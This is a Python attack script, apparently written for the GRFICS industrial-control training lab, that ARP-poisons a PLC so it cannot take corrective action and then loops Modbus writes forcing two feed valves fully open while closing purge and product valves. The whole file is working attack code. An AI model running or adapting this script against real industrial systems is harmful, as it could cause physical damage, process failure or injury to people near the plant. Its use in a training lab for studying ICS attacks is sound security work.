| | #!/usr/bin/env python |
---|
| | |
---|
| | """ |
---|
| | File: GRFICS_bang.py |
---|
| | Desc: Set the registers to values wanted and ARP poison the PLC so it can't correct. |
---|
| | """ |
---|
| | __author__ = '0xRoM' |
---|
| | from scapy.all import Ether, ARP, srp, send |
---|
| | from pyModbusTCP.client import ModbusClient |
---|
| | from multiprocessing import Process |
---|
| | import time |
---|
| | import sys |
---|
| | import os |
---|
| | |
---|
| | def _enable_linux_iproute(): |
---|
| | """ |
---|
| | Enables IP route ( IP Forward ) in linux-based distro |
---|
| | """ |
---|
| | os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') |
---|
| | |
---|
| | def get_mac(ip): |
---|
| | """ |
---|
| | Returns MAC address of any device connected to the network |
---|
| | If ip is down, returns None instead |
---|
| | """ |
---|
| | ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) |
---|
| | if ans: |
---|
| | return ans[0][1].src |
---|
| | |
---|
| | def spoof(target_ip, host_ip, verbose=True): |
---|
| | """ |
---|
| | Spoofs `target_ip` saying that we are `host_ip`. |
---|
| | it is accomplished by changing the ARP cache of the target (poisoning) |
---|
| | """ |
---|
| | # get the mac address of the target |
---|
| | target_mac = get_mac(target_ip) |
---|
| | # craft the arp 'is-at' operation packet, in other words; an ARP response |
---|
| | # we don't specify 'hwsrc' (source MAC address) |
---|
| | # because by default, 'hwsrc' is the real MAC address of the sender (ours) |
---|
| | arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') |
---|
| | # send the packet |
---|
| | # verbose = 0 means that we send the packet without printing any thing |
---|
| | send(arp_response, verbose=0) |
---|
| | if verbose: |
---|
| | # get the MAC address of the default interface we are using |
---|
| | self_mac = ARP().hwsrc |
---|
| | print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) |
---|
| | |
---|
| | def restore(target_ip, host_ip, verbose=True): |
---|
| | """ |
---|
| | Restores the normal process of a regular network |
---|
| | This is done by sending the original informations |
---|
| | (real IP and MAC of `host_ip` ) to `target_ip` |
---|
| | """ |
---|
| | # get the real MAC address of target |
---|
| | target_mac = get_mac(target_ip) |
---|
| | # get the real MAC address of spoofed (gateway, i.e router) |
---|
| | host_mac = get_mac(host_ip) |
---|
| | # crafting the restoring packet |
---|
| | arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) |
---|
| | # sending the restoring packet |
---|
| | # to restore the network to its normal process |
---|
| | # we send each reply seven times for a good measure (count=7) |
---|
| | send(arp_response, verbose=0, count=7) |
---|
| | if verbose: |
---|
| | print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) |
---|
| | |
---|
| | def spoof_wrapper(): |
---|
| | while True: |
---|
| | spoof(arp_target, arp_host, verbose) |
---|
| | |
---|
| | arp_target = "192.168.95.2" |
---|
| | arp_host = "192.168.95.1" |
---|
| | verbose = False |
---|
| | _enable_linux_iproute() |
---|
| | |
---|
| | try: |
---|
| | p = Process(target=spoof_wrapper) |
---|
| | p.start() |
---|
| | #p.join() # wait for it to finish! *yuk* |
---|
| | |
---|
| | while True: |
---|
| | |
---|
| | # set A |
---|
| | client=ModbusClient(host="192.168.95.10",port=502,auto_open=True,auto_close=True,timeout=10) |
---|
| | client.write_single_register(1,65535) |
---|
| | client.close() |
---|
| | |
---|
| | # set B |
---|
| | client=ModbusClient(host="192.168.95.11",port=502,auto_open=True,auto_close=True,timeout=10) |
---|
| | client.write_single_register(1,65535) |
---|
| | client.close() |
---|
| | |
---|
| | # set purge |
---|
| | client=ModbusClient(host="192.168.95.12",port=502,auto_open=True,auto_close=True,timeout=10) |
---|
| | client.write_single_register(1,0) |
---|
| | client.close() |
---|
| | |
---|
| | # set product |
---|
| | client=ModbusClient(host="192.168.95.13",port=502,auto_open=True,auto_close=True,timeout=10) |
---|
| | client.write_single_register(1,0) |
---|
| | client.close() |
---|
| | |
---|
| | #time.sleep(0.2) |
---|
| | |
---|
| | except KeyboardInterrupt: |
---|
| | print("[!] Detected CTRL+C ! restoring the network, please wait...") |
---|
| | restore(arp_target, arp_host) |
---|
| | |
---|
| | |